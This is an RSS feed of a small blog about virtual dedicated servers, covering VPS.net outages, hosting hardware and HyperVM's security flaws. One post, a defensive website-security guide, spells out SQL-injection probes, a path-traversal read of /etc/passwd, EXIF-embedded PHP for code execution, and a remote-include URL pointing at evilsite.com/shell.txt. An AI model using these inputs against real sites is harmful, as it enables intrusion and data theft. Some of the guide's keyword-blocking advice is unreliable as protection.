<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>UK VDS.com &#187; vps</title>
	<atom:link href="http://www.ukvds.com/tag/vps/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.ukvds.com</link>
	<description>ukvds.com is a blog about virtual dedicated servers</description>
	<lastBuildDate>Wed, 13 Oct 2010 09:21:18 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1</generator>
		<item>
		<title>VPS.net Downtime</title>
		<link>http://www.ukvds.com/12/vps-net-downtime/</link>
		<comments>http://www.ukvds.com/12/vps-net-downtime/#comments</comments>
		<pubDate>Tue, 01 Dec 2009 09:20:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[virtualization news]]></category>
		<category><![CDATA[vps]]></category>
		<category><![CDATA[vds]]></category>
		<category><![CDATA[vps.net]]></category>

		<guid isPermaLink="false">http://www.ukvds.com/?p=80</guid>
		<description><![CDATA[VPS.net appears to be suffering from repeated issues in the last month. Multiple SAN failures, Distributed Denial of Service attacks as well as other network related issues have brought much less less than 100% uptime in the last month with some users facing days of inaccessibility to their virtual servers.]]></description>
			<content:encoded><![CDATA[<p>VPS.net appears to be suffering from repeated issues in the last month. Multiple SAN failures, Distributed Denial of Service attacks as well as other network related issues have brought much less less than 100% uptime in the last month with some users facing days of inaccessibility to their virtual servers. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.ukvds.com/12/vps-net-downtime/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What is a Virtual Server?</title>
		<link>http://www.ukvds.com/09/what-is-a-virtual-server/</link>
		<comments>http://www.ukvds.com/09/what-is-a-virtual-server/#comments</comments>
		<pubDate>Mon, 14 Sep 2009 16:08:19 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[vps]]></category>
		<category><![CDATA[vds]]></category>

		<guid isPermaLink="false">http://www.ukvds.com/?p=74</guid>
		<description><![CDATA[Virtual Dedicated Servers feature full root access. Running on highly powerful and reliable host systems, a VDS gives you the full flexibility of a dedicated at a lower cost &#8211; ideal for low-usage niche applications, monitoring systems and more. A VDS provides the full flexibility of a dedicated server &#8211; you are free to install [...]]]></description>
			<content:encoded><![CDATA[<p>Virtual Dedicated Servers feature full root access. Running on highly powerful and reliable host systems, a VDS gives you the full flexibility of a dedicated at a lower cost &#8211; ideal for low-usage niche applications, monitoring systems and more.</p>
<p>A VDS provides the full flexibility of a dedicated server &#8211; you are free to install your own software and configure the system to your exact needs as there are no other users &#8211; at just a fraction of the cost. They are perfect for development environments, simple applications, and sites which need the security of a dedicated server but don&#8217;t need the additional power.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ukvds.com/09/what-is-a-virtual-server/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Dot Not Panel for Windows VPS</title>
		<link>http://www.ukvds.com/08/dot-not-panel-for-windows-vps/</link>
		<comments>http://www.ukvds.com/08/dot-not-panel-for-windows-vps/#comments</comments>
		<pubDate>Mon, 24 Aug 2009 17:15:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[vps]]></category>
		<category><![CDATA[control panel]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.ukvds.com/?p=66</guid>
		<description><![CDATA[http://www.techmixer.com/free-windows-hosting-control-panel-dotnetpanel-express-edition/ DotNetPanel Express Edition, a free hosting control panel for Windows Hosting that help Windows webmaster or windows home hosting simplifying Windows Hosting management operations. This free Windows hosting control panel offers its users with greater flexibility. It is written in C# and comprises with the latest technologies such as WMI, ADSI, SOAP Web Services [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.techmixer.com/free-windows-hosting-control-panel-dotnetpanel-express-edition/">http://www.techmixer.com/free-windows-hosting-control-panel-dotnetpanel-express-edition/</a></p>
<p>DotNetPanel Express Edition, a free hosting control panel for Windows Hosting that help Windows webmaster or windows home hosting simplifying Windows Hosting management operations. This free Windows hosting control panel offers its users with greater flexibility. It is written in C# and comprises with the latest technologies such as WMI, ADSI, SOAP Web Services with Web enhancements and N velocity Templates engine.</p>
<p>Meanwhile, DotNetPanel Express edition support for Exchange Server 2007, Windows Share Point Services, IIS 7.0, Microsoft Dynamics CRM and a new VPS solution for complete Enterprise level automation of virtualization. It is reputed as the fastest AJAX enabled control panel.</p>
<p>The DNP Express Edition is ideal for VPS and dedicated server owners, home hosting, education and evaluation use. You can manage an unlimited number of domains or websites, install it on three servers with up to five users, and it runs on Windows Server 2008 Web edition. And, best of all, it’s FREE! </p>
]]></content:encoded>
			<wfw:commentRss>http://www.ukvds.com/08/dot-not-panel-for-windows-vps/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Microsoft Hyper V</title>
		<link>http://www.ukvds.com/08/microsoft-hyper-v/</link>
		<comments>http://www.ukvds.com/08/microsoft-hyper-v/#comments</comments>
		<pubDate>Tue, 18 Aug 2009 13:49:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[virtualization news]]></category>
		<category><![CDATA[vps]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.ukvds.com/?p=61</guid>
		<description><![CDATA[http://www.networkworld.com/community/node/44452 During this week&#8217;s Converging on Microsoft podcast interview with Mike Schutz, Director of Product Management for the Microsoft Windows Server Division, we discuss the relevant steps necessary to secure servers running Hyper-V. Microsoft has a number of resources you will find helpful (links at the end of this article) and Mike&#8217;s interview is also [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.networkworld.com/community/node/44452">http://www.networkworld.com/community/node/44452</a></p>
<p>During this week&#8217;s Converging on Microsoft podcast interview with Mike Schutz, Director of Product Management for the Microsoft Windows Server Division, we discuss the relevant steps necessary to secure servers running Hyper-V. Microsoft has a number of resources you will find helpful (links at the end of this article) and Mike&#8217;s interview is also a great place to learn what&#8217;s happening with Hyper-V security.</p>
<p>One of the most valuable tools Microsoft has for securing Hyper-V is their Hyper-V Security Guide. The Hyper-V SG layouts it out in three steps: Hardening Hyper-V, Delegating Virtual Machine Management, and Protecting Virtual Machines. Here are some added thoughts and commentary beyond what the document offers. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.ukvds.com/08/microsoft-hyper-v/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Website Security &amp; Securing your Server</title>
		<link>http://www.ukvds.com/08/website-security-securing-your-server/</link>
		<comments>http://www.ukvds.com/08/website-security-securing-your-server/#comments</comments>
		<pubDate>Mon, 10 Aug 2009 17:10:17 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[vps]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[servers]]></category>
		<category><![CDATA[vds]]></category>
		<category><![CDATA[websites]]></category>

		<guid isPermaLink="false">http://www.ukvds.com/?p=49</guid>
		<description><![CDATA[Number 1, If you are using a common CMS Google it with the word exploit make sure your version is not listed Next try any Get Vars in your scripts and put a &#8216; at the end of them what I mean is you have = you add &#8216; so it&#8217;s yourwebsite.com/page?=&#8217; or any other [...]]]></description>
			<content:encoded><![CDATA[<p>Number 1, If you are using a common CMS Google it with the word exploit make sure your version is not listed</p>
<p>Next try any Get Vars in your scripts and put a &#8216; at the end of them what I mean is you have = you add &#8216; so it&#8217;s yourwebsite.com/page?=&#8217; or any other similar thing not only page= you may also try char(39) rather then only &#8216; most PHP scripts will automatically add add slashes as a function in the MySQL read so when it goes to read it comments out the &#8216; but most PHP that only uses addslashes protection will still be vuln to SQL injection simply using char(39) which the php script will read as a single quote.<br />
If you get an error you might want to check the script.</p>
<p>The errors you may receive are mysql_* this is a sql injection get right on to fixing this because some one would have the ability of dumping your whole database, clients, admins, etc.</p>
<p>If the errors are main()or include_failed you may have just found an LFI (Local File Inclusion) OR RFI (Remote File Inclusion)&#8230;  If it is in a path like failed to include /test/file.ext ever then this is an LFI but is very useful to a hacker they have the ability to use. The following to browse into other places ../../../../ if they wanted to they&#8217;d view your passwd file via ../../../../../../etc/passwd</p>
<p>Well right now you&#8217;d say big Woop they got some users maybe not but  still have the ability to go to any forum on<br />
that server and upload an  avatar with PHP-EXIF data in it then include it. Using this LFI once they have done this it will execute the code written in this LFI meaning they have access to Run PHP-Code on your server now not good at all&#8230;</p>
<p>Recommendations fix the script have mod security block all  ../../../../../ to a certain point attempts.</p>
<p>Ok next were going to  discuss the abilities of an RFI and how to block it&#8230;<br />
So the things you can  do with an RFI well lets see remotely include an PHP file that will execute its  php file like so<br />
<a href="http://www.yoursite.com/file.php?file=evilsite.com/shell.txt" target="_blank">www.yoursite.com/file.php?file=evilsite.com/shell.txt</a>? this php file on your server would then remotely include the other file and execute the PHP code also allowing the user access to your server.</p>
<p>Prevention add http:// to your mod security this way when they  try remotely including a file in the URL httpd:// mod_security will block it.</p>
<p>Ok our next subject is XSS. What can XSS do XSS means cross site scripting a hacker can execute JavaScript code on your website using this some XSS is bad which would be called permanent XSS it allows users to embed their JavaScript inside something where you wouldn&#8217;t really see it&#8230; but when you clicked they could potentially grab your cookie or any current stored browser information. With this they could  use your cookie as their own to login as you&#8230; maybe even get password  information from this cookie.</p>
<p>As for SQL injection the way to block this is to&#8230; add &#8216; or /* to the mod security be sure to add in char(39) as it&#8217;s &#8216; in php and php will in fact read it from a URL and interpret it as &#8216; and still launch the sql injection.</p>
<p>One other thing you can do that is not exactly completely necessary but will help if any one does manage to get access to your website.Is you can encrypt all your db.php/conf.php/ files so that hackers cant read the information to gain access to your mysql database or gain any other passwords/usernames you might commonly use more then once.  You can do this by obfuscating the code using Zend or similar.</p>
<p>Finally, never leave any open upload scripts what so ever any open upload scripts left on your website will allow the hacker/attacker the ability to upload a file sure you can restrict them to only uploading JPG files or GIF,RAR etc.<br />
But the only problem with that is unless you customize your upload script to check for EXIF data and clear it out of an image when uploading it then the hacker still has something to use against you.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ukvds.com/08/website-security-securing-your-server/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>HyperVM &#8211; Virtual Server Management</title>
		<link>http://www.ukvds.com/06/hypervm-virtual-server-management/</link>
		<comments>http://www.ukvds.com/06/hypervm-virtual-server-management/#comments</comments>
		<pubDate>Fri, 12 Jun 2009 16:03:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[vps]]></category>
		<category><![CDATA[hypervm]]></category>
		<category><![CDATA[server management]]></category>
		<category><![CDATA[vds]]></category>

		<guid isPermaLink="false">http://www.ukvds.com/hypervm-virtual-server-management/</guid>
		<description><![CDATA[HyperVM is a popular piece of software for managing nodes running virtual servers. Unfortunately, over the last few months it has become apparent that the software appears to be incredibly flawed. Security wise, there have been numerous critical vulnerability updates release. Any provider that was slow with their server updates will have found their systems [...]]]></description>
			<content:encoded><![CDATA[<p>HyperVM is a popular piece of software for managing nodes running virtual servers. Unfortunately, over the last few months it has become apparent that the software appears to be incredibly flawed. Security wise, there have been numerous critical vulnerability updates release. Any provider that was slow with their server updates will have found their systems extremely vulnerable to hacking.</p>
<p>Culminating in the recent hack of A2B2/Vaserv/FSCK VPS, where tens of thousands of websites were taken offline on multiple servers by exploiting a serious vulnerability in the HyperVM virtual machine management software.<br />
<a href="http://www.theregister.co.uk/2009/06/08/webhost_attack/" target="_blank">http://www.theregister.co.uk/2009/06/08/webhost_attack/</a></p>
<p>Whilst automation is an important detail of an efficient system &#8211; it is even more important to ensure that the integrity of that system is not compromised by implementing the automation. In this instance, a single installation of HyperVM with root access to many dozens of servers was compromised. It is important to consider worst case scenarios with any kind of service. What is the absolute worst that could happen to my system? What would be my nightmare?</p>
<p><strong>Think of your nightmare&#8230; and then multiply it a few times. Then make a contingency plan. </strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.ukvds.com/06/hypervm-virtual-server-management/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>VDS Hosting</title>
		<link>http://www.ukvds.com/05/vds-hosting/</link>
		<comments>http://www.ukvds.com/05/vds-hosting/#comments</comments>
		<pubDate>Fri, 22 May 2009 21:30:05 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[vps]]></category>
		<category><![CDATA[hardware]]></category>
		<category><![CDATA[servers]]></category>
		<category><![CDATA[vds hosting]]></category>

		<guid isPermaLink="false">http://www.ukvds.com/?p=12</guid>
		<description><![CDATA[Typical Virtual Dedicated Hosting hardware would involve using a very powerful machine, such that the server when &#8220;sliced up&#8221; will still offer excellent performance. Typically, you will want to use multiple quad core CPUs with 8GB+ of RAM. However, the key piece of hardware that most people overlook when looking for a VPS or VDS [...]]]></description>
			<content:encoded><![CDATA[<p>Typical Virtual Dedicated Hosting hardware would involve using a very powerful machine, such that the server when &#8220;sliced up&#8221; will still offer excellent performance. Typically, you will want to use multiple quad core CPUs with 8GB+ of RAM. However, the key piece of hardware that most people overlook when looking for a VPS or VDS host is that of disks. Hard disks are still the bottleneck in all modern computer systems, and when those disks are busy, the CPU can do little else but wait. You can have all the CPU power in the world but with slow disks, they&#8217;ll never be able to do anything useful &#8211; especially when it comes to hosting.</p>
<p>We would generally recommend multiple SAS (Serial Attached SCSI) disks in RAID10 configuration. The more disks you have in the RAID10 array, the best the performance overall. Fast disks make for a system that &#8220;feels&#8221; a lot faster, and will give the edge over systems using much slower SATA disks.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ukvds.com/05/vds-hosting/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What is a Virtual Dedicated Server?</title>
		<link>http://www.ukvds.com/04/what-is-a-virtual-dedicated-server/</link>
		<comments>http://www.ukvds.com/04/what-is-a-virtual-dedicated-server/#comments</comments>
		<pubDate>Mon, 20 Apr 2009 11:52:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[vps]]></category>
		<category><![CDATA[dedicated server]]></category>
		<category><![CDATA[hosting]]></category>
		<category><![CDATA[vds]]></category>

		<guid isPermaLink="false">http://www.ukvds.com/?p=5</guid>
		<description><![CDATA[A virtual dedicated server (VDS, also referred to as Virtual Private Server or VPS) is a method of partitioning a physical server computer into multiple &#8220;virtual&#8221; servers such that each has the appearance and capabilities of running on its own dedicated machine. Each virtual server can run its own full-fledged operating system, and each server [...]]]></description>
			<content:encoded><![CDATA[<p>A <strong>virtual dedicated server</strong> (VDS, also referred to as <strong>Virtual Private Server</strong> or VPS) is a method of partitioning a physical server computer into multiple &#8220;virtual&#8221; servers such that each has the appearance and capabilities of running on its own dedicated machine. Each virtual server can run its own full-fledged operating system, and each server can be independently controlled/rebooted/resized/migrated.</p>
<p>There are two kinds of virtualisation: software based and hardware based. In a software based virtual environment, the virtual machines share the same kernel and actually require the main node&#8217;s resources. This kind of virtualization normally has many benefits in a web hosting environment because of quota incrementing and decrementing in real time with no need to restart the node. The main examples are <a title="Xen" href="http://en.wikipedia.org/wiki/Xen">Xen</a>, <a class="mw-redirect" title="Virtuozzo" href="http://en.wikipedia.org/wiki/Virtuozzo">Virtuozzo</a>, <a class="mw-redirect" title="Vserver" href="http://en.wikipedia.org/wiki/Vserver">Vserver</a>, and <a title="OpenVZ" href="http://en.wikipedia.org/wiki/OpenVZ">OpenVZ</a> (which is the <a title="Open source" href="http://en.wikipedia.org/wiki/Open_source">open source</a> and development version of Parallels Virtuozzo Containers).</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ukvds.com/04/what-is-a-virtual-dedicated-server/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

